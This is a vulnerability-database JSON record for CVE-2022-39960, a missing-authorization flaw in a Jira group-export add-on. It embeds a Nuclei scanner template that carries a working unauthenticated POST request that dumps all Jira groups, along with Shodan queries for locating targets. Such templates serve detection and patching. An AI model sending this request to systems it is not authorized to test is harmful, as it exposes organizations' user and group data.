{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-39960/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-39960/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-39960/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-39960/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-39960/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-39960"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-39960"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2022/CVE-2022-39960.yaml",
      "nuclei_template_severity": "medium",
      "nuclei_template_yaml": "id: CVE-2022-39960\n\ninfo:\n  name: Jira Netic Group Export <1.0.3 - Missing Authorization\n  author: For3stCo1d\n  severity: medium\n  description: |\n    Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n  impact: |\n    An attacker can exploit this vulnerability to gain unauthorized access to sensitive data.\n  remediation: |\n    Upgrade to Jira Netic Group Export version 1.0.3 or later to fix the missing authorization issue.\n  reference:\n    - https://gist.github.com/CveCt0r/ca8c6e46f536e9ae69fc6061f132463e\n    - https://marketplace.atlassian.com/apps/1222388/group-export-for-jira/version-history\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-39960\n    - https://github.com/ARPSyndicate/kenzer-templates\n    - https://github.com/Henry4E36/POCS\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2022-39960\n    cwe-id: CWE-862\n    epss-score: 0.2568\n    epss-percentile: 0.9789\n    cpe: cpe:2.3:a:netic:group_export:*:*:*:*:*:jira:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: netic\n    product: group_export\n    framework: jira\n    shodan-query:\n      - http.component:\"Atlassian Jira\"\n      - http.component:\"atlassian jira\"\n  tags: cve,cve2022,atlassian,jira,netic,unauth,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        groupexport_searchstring=&groupexport_download=true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"jiraGroupObjects\"'\n          - '\"groupName\"'\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - \"attachment\"\n          - \"jira-group-export\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100e93ae948788fd2423035e4a13496989cee1c28c1f2caca3ecc9b50e5b16bd5bf022100813f5700a53ca0b56d4f7c79f27fbde4b225d34ecbed18014279201a3be5749e:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2022-39960"
}